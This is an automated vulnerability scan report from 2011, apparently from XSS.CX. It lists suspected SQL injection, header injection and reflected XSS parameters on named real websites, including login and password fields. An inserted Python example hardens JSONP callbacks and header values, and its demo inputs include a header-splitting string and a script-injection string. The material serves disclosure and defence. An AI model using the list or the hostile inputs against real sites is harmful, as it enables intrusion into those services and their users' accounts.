XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 10182011-01

Report generated by XSS.CX at Tue Oct 18 07:02:54 CDT 2011.


1. SQL injection

1.1. http://code.randomhouse.com/b/ss/ranhcorporate,ranhrollup/1/H.17/s72574234255265 [REST URL parameter 1]

1.2. http://code.randomhouse.com/b/ss/ranhcorporate,ranhrollup/1/H.17/s74819229580448 [REST URL parameter 1]

1.3. http://code.randomhouse.com/b/ss/ranhcorporate,ranhrollup/1/H.17/s79384069200516 [REST URL parameter 4]

1.4. http://code.randomhouse.com/b/ss/ranhrollup/1/H.22.1/s75506922125350 [REST URL parameter 1]

1.5. http://code.randomhouse.com/b/ss/ranhrollup/1/H.22.1/s79787087680306 [REST URL parameter 1]

1.6. http://kbportal.thomson.com/ [PW parameter]

1.7. http://kbportal.thomson.com/ [UN parameter]

1.8. http://kbportal.thomson.com/ [cid parameter]

1.9. http://kbportal.thomson.com/ [cpc parameter]

1.10. http://kbportal.thomson.com/display/2/login.aspx [cpid parameter]

1.11. http://kbportal.thomson.com/display/2/login.aspx [password parameter]

1.12. http://kbportal.thomson.com/display/2/login.aspx [username parameter]

1.13. http://kbportal.thomson.com/index.aspx [cid parameter]

1.14. http://kbportal.thomson.com/index.aspx [cpc parameter]

1.15. http://west.thomson.com/store/secure/ShoppingBasket.aspx [__EVENTARGUMENT parameter]

1.16. http://west.thomson.com/store/secure/ShoppingBasket.aspx [_msuuid_787f8z6077 cookie]

1.17. http://west.thomson.com/store/secure/ShoppingBasket.aspx [c cookie]

1.18. http://west.thomson.com/store/secure/ShoppingBasket.aspx [s_id cookie]

1.19. http://www.computerworld.com/s/article/9216003/Texas_fires_two_tech_chiefs_over_breach [name of an arbitrarily supplied request parameter]

2. LDAP injection

3. Cross-site scripting (stored)

4. HTTP header injection

4.1. http://ad.uk.doubleclick.net/adj/new.computerworlduk.com/security1 [REST URL parameter 1]

4.2. http://ad.uk.doubleclick.net/adj/new.computerworlduk.com/security2 [REST URL parameter 1]

4.3. http://widgetserver.com/syndication/get_widget.js [callback parameter]

4.4. http://www.widgetserver.com/syndication/get_widget.js [callback parameter]
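
The header-injection entries above all name a JSONP `callback` parameter, which is the usual way a request value ends up both inside a script body and inside a response header. The following hardening is an added example, not code from the XSS.CX report or from the widgetserver.com service: it allowlists the callback as a dotted JavaScript identifier and refuses CR/LF in anything written to a header. The `X-Callback` header and the payload string are assumptions made for illustration.

```python
import re

# Allowlist for a JSONP callback: a dotted JavaScript identifier path such as
# "jQuery17201234_5678" or "window.handlers.cb". Anything else (parentheses,
# quotes, angle brackets, CR/LF) is rejected outright rather than sanitised.
CALLBACK_RE = re.compile(r"[A-Za-z_$][A-Za-z0-9_$]*(?:\.[A-Za-z_$][A-Za-z0-9_$]*)*")
MAX_CALLBACK_LEN = 64


def validate_callback(name):
    """Return True only if `name` is an acceptable JSONP callback identifier."""
    return len(name) <= MAX_CALLBACK_LEN and CALLBACK_RE.fullmatch(name) is not None


def is_safe_header_value(value):
    """A header value must not contain CR, LF or NUL.

    Reflecting an unchecked request parameter into a response header is the
    root cause of HTTP header injection (response splitting): one "\\r\\n"
    lets the caller append further headers, or even a second body.
    """
    return not any(c in value for c in "\r\n\x00")


def safe_header_value(value):
    """Return `value` unchanged, or raise if it could split the header block."""
    if not is_safe_header_value(value):
        raise ValueError("CR/LF/NUL not permitted in a header value")
    return value


def build_jsonp_response(callback, payload_json):
    """Assemble status, headers and body for a JSONP reply.

    `X-Callback` is a hypothetical header, included only to show a
    request-derived value passing through safe_header_value() before it is
    emitted. `payload_json` is assumed to be JSON the server serialised itself.
    """
    if not validate_callback(callback):
        return {"status": 400,
                "headers": {"Content-Type": "text/plain"},
                "body": "invalid callback"}
    headers = {
        "Content-Type": "application/javascript; charset=utf-8",
        # Stops browsers treating the script as HTML if it is ever navigated to.
        "X-Content-Type-Options": "nosniff",
        "X-Callback": safe_header_value(callback),
    }
    # The "/**/" prefix keeps the first bytes of the body out of the caller's
    # control, the mitigation Google adopted against Rosetta Flash.
    body = "/**/" + callback + "(" + payload_json + ");"
    return {"status": 200, "headers": headers, "body": body}


if __name__ == "__main__":
    for cb in ("jQuery17201234_5678", "alert(1)//", "cb\r\nSet-Cookie: a=b"):
        print(repr(cb), "->", build_jsonp_response(cb, '{"ok":true}')["status"])
```

Rejecting rather than stripping matters: a sanitiser that deletes `<` or `\r` still lets `\n` or a Unicode line separator through, while the allowlist fails closed.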

5. Cross-site scripting (reflected)

5.1. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.14 [labels parameter]

5.2. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.14 [redirecturl2 parameter]

5.3. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.14 [rtbdata2 parameter]

5.4. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.14 [rtbip parameter]

5.5. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.14 [sz parameter]

5.6. http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105 [&PID parameter]

5.7. http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105 [AN parameter]

5.8. http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105 [ASID parameter]

5.9. http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105 [PG parameter]

5.10. http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105 [TargetID parameter]

5.11. http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105 [UIT parameter]

5.12. http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105 [destination parameter]

5.13. http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105 [sz parameter]

5.14. http://ad.doubleclick.net/adi/N6092.msn/B5302320.25 [&PID parameter]

5.15. http://ad.doubleclick.net/adi/N6092.msn/B5302320.25 [AN parameter]

5.16. http://ad.doubleclick.net/adi/N6092.msn/B5302320.25 [ASID parameter]

5.17. http://ad.doubleclick.net/adi/N6092.msn/B5302320.25 [PG parameter]

5.18. http://ad.doubleclick.net/adi/N6092.msn/B5302320.25 [TargetID parameter]

5.19. http://ad.doubleclick.net/adi/N6092.msn/B5302320.25 [UIT parameter]

5.20. http://ad.doubleclick.net/adi/N6092.msn/B5302320.25 [destination parameter]

5.21. http://ad.doubleclick.net/adi/N6092.msn/B5302320.25 [sz parameter]

5.22. http://ad.doubleclick.net/adj/N5047.MSN/B3795397.61 [&PID parameter]

5.23. http://ad.doubleclick.net/adj/N5047.MSN/B3795397.61 [AN parameter]

5.24. http://ad.doubleclick.net/adj/N5047.MSN/B3795397.61 [ASID parameter]

5.25. http://ad.doubleclick.net/adj/N5047.MSN/B3795397.61 [PG parameter]

5.26. http://ad.doubleclick.net/adj/N5047.MSN/B3795397.61 [TargetID parameter]

5.27. http://ad.doubleclick.net/adj/N5047.MSN/B3795397.61 [UIT parameter]

5.28. http://ad.doubleclick.net/adj/N5047.MSN/B3795397.61 [destination parameter]

5.29. http://ad.doubleclick.net/adj/N5047.MSN/B3795397.61 [sz parameter]

5.30. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.100 [&PID parameter]

5.31. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.100 [AN parameter]

5.32. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.100 [ASID parameter]

5.33. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.100 [PG parameter]

5.34. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.100 [TargetID parameter]

5.35. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.100 [UIT parameter]

5.36. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.100 [destination parameter]

5.37. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.100 [sz parameter]

5.38. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.106 [&PID parameter]

5.39. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.106 [AN parameter]

5.40. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.106 [ASID parameter]

5.41. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.106 [PG parameter]

5.42. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.106 [TargetID parameter]

5.43. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.106 [UIT parameter]

5.44. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.106 [destination parameter]

5.45. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.106 [sz parameter]

5.46. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959** [&PID parameter]

5.47. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959** [10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click parameter]

5.48. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959** [AN parameter]

5.49. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959** [ASID parameter]

5.50. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959** [PG parameter]

5.51. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959** [TargetID parameter]

5.52. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959** [UIT parameter]

5.53. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959** [name of an arbitrarily supplied request parameter]

5.54. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806 [&PID parameter]

5.55. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806 [AN parameter]

5.56. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806 [ASID parameter]

5.57. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806 [PG parameter]

5.58. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806 [REST URL parameter 2]

5.59. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806 [REST URL parameter 3]

5.60. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806 [TargetID parameter]

5.61. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806 [UIT parameter]

5.62. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806 [click parameter]

5.63. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806 [name of an arbitrarily supplied request parameter]

5.64. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959** [&PID parameter]

5.65. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959** [10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click parameter]

5.66. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959** [AN parameter]

5.67. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959** [ASID parameter]

5.68. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959** [PG parameter]

5.69. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959** [TargetID parameter]

5.70. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959** [UIT parameter]

5.71. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959** [name of an arbitrarily supplied request parameter]

5.72. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218** [&PID parameter]

5.73. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218** [10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click parameter]

5.74. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218** [AN parameter]

5.75. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218** [ASID parameter]

5.76. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218** [PG parameter]

5.77. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218** [TargetID parameter]

5.78. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218** [UIT parameter]

5.79. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218** [name of an arbitrarily supplied request parameter]

5.80. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628 [&PID parameter]

5.81. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628 [AN parameter]

5.82. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628 [ASID parameter]

5.83. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628 [PG parameter]

5.84. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628 [REST URL parameter 2]

5.85. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628 [REST URL parameter 3]

5.86. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628 [TargetID parameter]

5.87. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628 [UIT parameter]

5.88. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628 [click parameter]

5.89. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628 [name of an arbitrarily supplied request parameter]

5.90. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152 [&PID parameter]

5.91. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152 [AN parameter]

5.92. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152 [ASID parameter]

5.93. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152 [PG parameter]

5.94. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152 [REST URL parameter 2]

5.95. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152 [REST URL parameter 3]

5.96. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152 [TargetID parameter]

5.97. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152 [UIT parameter]

5.98. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152 [click parameter]

5.99. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152 [name of an arbitrarily supplied request parameter]

5.100. http://api.bing.com/qsonhs.aspx [q parameter]

5.101. http://ar.voicefive.com/b/rc.pli [func parameter]

5.102. http://b.scorecardresearch.com/beacon.js [c1 parameter]

5.103. http://b.scorecardresearch.com/beacon.js [c2 parameter]

5.104. http://b.scorecardresearch.com/beacon.js [c3 parameter]

5.105. http://b.scorecardresearch.com/beacon.js [c4 parameter]

5.106. http://b.scorecardresearch.com/beacon.js [c5 parameter]

5.107. http://b.scorecardresearch.com/beacon.js [c6 parameter]

5.108. http://cdn.widgetserver.com/syndication/json/i/077f25c8-0348-4215-9539-57b2ff17f13b/iv/15/n/code/nv/4/p/2/r/621004a9-a717-4271-bd6a-b454b74a1d68/rv/101/t/0ecb188b389ef47932686132b264ecdcbd658d2a0000012f8ab32f74/u/2/ [REST URL parameter 18]

5.109. http://cdn.widgetserver.com/syndication/json/i/077f25c8-0348-4215-9539-57b2ff17f13b/iv/15/n/code/nv/4/p/2/r/621004a9-a717-4271-bd6a-b454b74a1d68/rv/101/t/0ecb188b389ef47932686132b264ecdcbd658d2a0000012f8ab32f74/u/2/ [REST URL parameter 4]

5.110. http://cdn.widgetserver.com/syndication/json/i/3651dbe5-aec4-42b2-8270-d62db9a25bfe/iv/5/n/wbx/nv/2/p/2/r/6ba05ce8-62f3-46d0-bb21-b5f833b4817f/rv/367/t/34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211/u/2/ [REST URL parameter 18]

5.111. http://cdn.widgetserver.com/syndication/json/i/3651dbe5-aec4-42b2-8270-d62db9a25bfe/iv/5/n/wbx/nv/2/p/2/r/6ba05ce8-62f3-46d0-bb21-b5f833b4817f/rv/367/t/34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211/u/2/ [REST URL parameter 4]

5.112. http://cdn.widgetserver.com/syndication/json/i/9dc88731-b2ec-4909-9bc6-b15b8881219b/iv/2/n/code/nv/4/p/1/r/a5eaf8f4-5bfb-4aa0-9d12-1707dde89c3e/rv/52/t/095ceb1aff68cc1170437fc8a7c33749a6e5729d0000012f8b0da168/u/1/ [REST URL parameter 18]

5.113. http://cdn.widgetserver.com/syndication/json/i/9dc88731-b2ec-4909-9bc6-b15b8881219b/iv/2/n/code/nv/4/p/1/r/a5eaf8f4-5bfb-4aa0-9d12-1707dde89c3e/rv/52/t/095ceb1aff68cc1170437fc8a7c33749a6e5729d0000012f8b0da168/u/1/ [REST URL parameter 4]

5.114. http://cdn.widgetserver.com/syndication/json/i/a2cf3a06-8341-401d-9929-c445542d58f5/iv/3/n/code/nv/4/p/0/r/8e8d4b61-3cef-4782-bdf3-34277bd49172/rv/132/t/e319266ef2e04c39f5ae5accf233b10078f950d70000012f8ab5b5e1/u/2/ [REST URL parameter 18]

5.115. http://cdn.widgetserver.com/syndication/json/i/a2cf3a06-8341-401d-9929-c445542d58f5/iv/3/n/code/nv/4/p/0/r/8e8d4b61-3cef-4782-bdf3-34277bd49172/rv/132/t/e319266ef2e04c39f5ae5accf233b10078f950d70000012f8ab5b5e1/u/2/ [REST URL parameter 4]

5.116. http://cdn.widgetserver.com/syndication/mobile/x/css/preview.css [REST URL parameter 2]

5.117. http://ds.addthis.com/red/psi/sites/www.bertelsmann.com/p.json [callback parameter]

5.118. http://ecommerce.randomhouse.com/cart.do [from parameter]

5.119. http://ecommerce.randomhouse.com/cart.do [from parameter]

5.120. http://ecommerce.randomhouse.com/cart.do [from parameter]

5.121. https://ecommerce.randomhouse.com/account.do [from parameter]

5.122. https://ecommerce.randomhouse.com/account.do [from parameter]

5.123. https://ecommerce.randomhouse.com/account.do [from parameter]

5.124. https://ecommerce.randomhouse.com/create-account-submit.do [confirmPassword parameter]

5.125. https://ecommerce.randomhouse.com/create-account-submit.do [email parameter]

5.126. https://ecommerce.randomhouse.com/create-account-submit.do [password parameter]

5.127. https://ecommerce.randomhouse.com/create-account.do [from parameter]

5.128. https://ecommerce.randomhouse.com/create-account.do [from parameter]

5.129. https://ecommerce.randomhouse.com/password.do [from parameter]

5.130. https://ecommerce.randomhouse.com/password.do [from parameter]

5.131. https://ecommerce.randomhouse.com/sign-in-submit.do [email parameter]

5.132. https://ecommerce.randomhouse.com/sign-in-submit.do [password parameter]

5.133. https://ecommerce.randomhouse.com/sign-in.do [from parameter]

5.134. https://ecommerce.randomhouse.com/sign-in.do [from parameter]

5.135. https://ecommerce.randomhouse.com/sign-in.do [from parameter]

5.136. https://ecommerce.randomhouse.com/sign-in.do [from parameter]

5.137. https://ecommerce.randomhouse.com/sign-in.do [from parameter]

5.138. http://g.adspeed.net/ad.php [ht parameter]

5.139. http://g.adspeed.net/ad.php [wd parameter]

5.140. http://img.mediaplex.com/content/0/10105/PF_Mday11_300x250_Coupon_1DznastMdspecDlxdelight.html [mpck parameter]

5.141. http://img.mediaplex.com/content/0/10105/PF_Mday11_300x250_Coupon_1DznastMdspecDlxdelight.html [mpck parameter]

5.142. http://img.mediaplex.com/content/0/10105/PF_Mday11_300x250_Coupon_1DznastMdspecDlxdelight.html [mpvc parameter]

5.143. http://img.mediaplex.com/content/0/10105/PF_Mday11_300x250_Coupon_1DznastMdspecDlxdelight.html [mpvc parameter]

5.144. http://img.mediaplex.com/content/0/15902/126860/hitachi_anywhere336x280.js [mpck parameter]

5.145. http://img.mediaplex.com/content/0/15902/126860/hitachi_anywhere336x280.js [mpvc parameter]

5.146. http://kbportal.thomson.com/display/2/_midframe.aspx [tab parameter]

5.147. http://kbportal.thomson.com/display/2/index.aspx [tab parameter]

5.148. http://kbportal.thomson.com/display/2/optframe.aspx [opt parameter]

5.149. http://kbportal.thomson.com/index.aspx [t parameter]

5.150. http://matrix.itasoftware.com/geosearch/service/json/getByCode/salesCity [callback parameter]

5.151. http://matrix.itasoftware.com/geosearch/service/json/suggest/citiesAndAirports [callback parameter]

5.152. http://matrix.itasoftware.com/xhr/shop/search [format parameter]

5.153. http://matrix.itasoftware.com/xhr/shop/search [name parameter]

5.154. http://matrix.itasoftware.com/xhr/shop/search [summarizers parameter]

5.155. http://matrix.itasoftware.com/xhr/shop/summarize [format parameter]

5.156. http://matrix.itasoftware.com/xhr/shop/summarize [summarizers parameter]

5.157. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard [mbox parameter]

5.158. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard [mbox parameter]

5.159. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard [mboxId parameter]

5.160. http://p.opt.fimserve.com/bht/ [px parameter]

5.161. http://pixel.fetchback.com/serve/fb/pdc [name parameter]

5.162. http://realestate.msn.us.intellitxt.com/al.asp [jscallback parameter]

5.163. http://realestate.msn.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

5.164. http://realestate.msn.us.intellitxt.com/v4/init [jscallback parameter]

5.165. http://realestate.msn.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]

5.166. http://recs.richrelevance.com/rrserver/p13n_generated.js [ctp parameter]

5.167. http://servedby.flashtalking.com/imp/3/14752 [94537;201;js;MSN;ADVMSNMSNMoneyInvestingHomepageRMBanner300x250CPM/?click parameter]

5.168. http://servedby.flashtalking.com/imp/3/14752 [cachebuster parameter]

5.169. http://servedby.flashtalking.com/imp/3/14752 [ftadz parameter]

5.170. http://servedby.flashtalking.com/imp/3/14752 [ftscw parameter]

5.171. http://servedby.flashtalking.com/imp/3/14752 [ftx parameter]

5.172. http://servedby.flashtalking.com/imp/3/14752 [fty parameter]

5.173. http://servedby.flashtalking.com/imp/3/14752 [name of an arbitrarily supplied request parameter]

5.174. http://wd.sharethis.com/api/getApi.php [cb parameter]

5.175. http://west.thomson.com/support/contact-us/default.aspx [FindingMethod parameter]

5.176. http://west.thomson.com/support/contact-us/default.aspx [FindingMethod parameter]

5.177. http://west.thomson.com/support/contact-us/default.aspx [PromCode parameter]

5.178. http://west.thomson.com/support/contact-us/default.aspx [PromCode parameter]

5.179. http://west.thomson.com/support/contact-us/default.aspx [name of an arbitrarily supplied request parameter]

5.180. https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx [FindingMethod parameter]

5.181. https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx [PromCode parameter]

5.182. https://west.thomson.com/support/customer-service/order-info.aspx [name of an arbitrarily supplied request parameter]

5.183. http://widget.needle.itasoftware.com/widget/Matrix2.do [callback parameter]

5.184. http://widgets.digg.com/buttons/count [url parameter]

5.185. http://widgetserver.com/syndication/subscriber/InsertPanel.js [panelId parameter]

5.186. http://www.allpages.com/ [980251%22';944334 parameter]

5.187. http://www.allpages.com/ [name of an arbitrarily supplied request parameter]

5.188. http://www.aptm.phoenix.edu/ [channel parameter]

5.189. http://www.aptm.phoenix.edu/ [classification parameter]

5.190. http://www.aptm.phoenix.edu/ [creative_desc parameter]

5.191. http://www.aptm.phoenix.edu/ [creative_id parameter]

5.192. http://www.aptm.phoenix.edu/ [destination parameter]

5.193. http://www.aptm.phoenix.edu/ [distribution parameter]

5.194. http://www.aptm.phoenix.edu/ [initiative parameter]

5.195. http://www.aptm.phoenix.edu/ [keyword parameter]

5.196. http://www.aptm.phoenix.edu/ [mktg_prog parameter]

5.197. http://www.aptm.phoenix.edu/ [provider parameter]

5.198. http://www.aptm.phoenix.edu/ [pvp_campaign parameter]

5.199. http://www.aptm.phoenix.edu/ [unit parameter]

5.200. http://www.aptm.phoenix.edu/ [user1 parameter]

5.201. http://www.aptm.phoenix.edu/ [user2 parameter]

5.202. http://www.aptm.phoenix.edu/ [user3 parameter]

5.203. http://www.aptm.phoenix.edu/ [version parameter]

5.204. http://www.aptm.phoenix.edu/AptiNet/hhs [level_education parameter]

5.205. http://www.aptm.phoenix.edu/AptiNet/hhs [program_type parameter]

5.206. http://www.aptm.phoenix.edu/AptiNet/hhs [program_type2 parameter]

5.207. http://www.aptm.phoenix.edu/AptiNet/hhs [registered_nurse parameter]

5.208. http://www.aptm.phoenix.edu/AptiNet/hhs [state parameter]

5.209. http://www.bertelsmann.com/bertelsmann_corp/wms41/bm/index.php [language parameter]

5.210. http://www.bertelsmann.com/bertelsmann_corp/wms41/bm/index.php [name of an arbitrarily supplied request parameter]

5.211. http://www.bertelsmann.com/bertelsmann_corp/wms41/inc/AJAX_MUZ_Statistics.server.php [name of an arbitrarily supplied request parameter]

5.212. http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/ [REST URL parameter 2]

5.213. http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/ [REST URL parameter 4]

5.214. http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/ [name of an arbitrarily supplied request parameter]

5.215. http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/ [olo parameter]

5.216. http://www.freemanco.com/store [from parameter]

5.217. http://www.freemanco.com/store/ [from parameter]

5.218. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx [_IG_CALLBACK parameter]

5.219. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx [__EVENTVALIDATION parameter]

5.220. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx [name of an arbitrarily supplied request parameter]

5.221. https://www.fusionvm.com/FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx [Alias parameter]

5.222. https://www.fusionvm.com/FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx [Lang parameter]

5.223. http://www.magellangps.com/ [name of an arbitrarily supplied request parameter]

5.224. http://www.magellangps.com/s.nl [name of an arbitrarily supplied request parameter]

5.225. http://www.randomhouse.com/cgi-bin/feedback/feedback.php [loc parameter]

5.226. http://www.randomhouse.com/cgi-bin/feedback/feedback.php [name of an arbitrarily supplied request parameter]

5.227. http://www.res-x.com/ws/r2/Resonance.aspx [cb parameter]

5.228. http://www.res-x.com/ws/r2/Resonance.aspx [sc parameter]

5.229. http://www.widgetbox.com/CatalogFeed/Stats [REST URL parameter 2]

5.230. http://www.widgetbox.com/CatalogFeed/Stats [callback parameter]

5.231. http://www.widgetserver.com/syndication/html5/3651dbe5-aec4-42b2-8270-d62db9a25bfe [lib.mobileCssSrc parameter]

5.232. http://www.widgetserver.com/syndication/html5/3651dbe5-aec4-42b2-8270-d62db9a25bfe [lib.mobileScriptSrc parameter]

5.233. http://www.widgetserver.com/syndication/html5/3651dbe5-aec4-42b2-8270-d62db9a25bfe [pages parameter]

5.234. http://www.widgetserver.com/syndication/html5/3651dbe5-aec4-42b2-8270-d62db9a25bfe [siteConfig parameter]

5.235. http://www.widgetserver.com/syndication/html5/3651dbe5-aec4-42b2-8270-d62db9a25bfe [wbxPageTitle parameter]

5.236. https://checkout.netsuite.com/s.nl [User-Agent HTTP header]

5.237. https://checkout.netsuite.com/s.nl [User-Agent HTTP header]

5.238. http://www.careerbuilder.com/iframe/recommendedcvupload.aspx [Referer HTTP header]

5.239. http://a.rfihub.com/ca.html [a cookie]

5.240. http://a.rfihub.com/ca.html [a1 cookie]

5.241. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

5.242. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

5.243. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

5.244. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

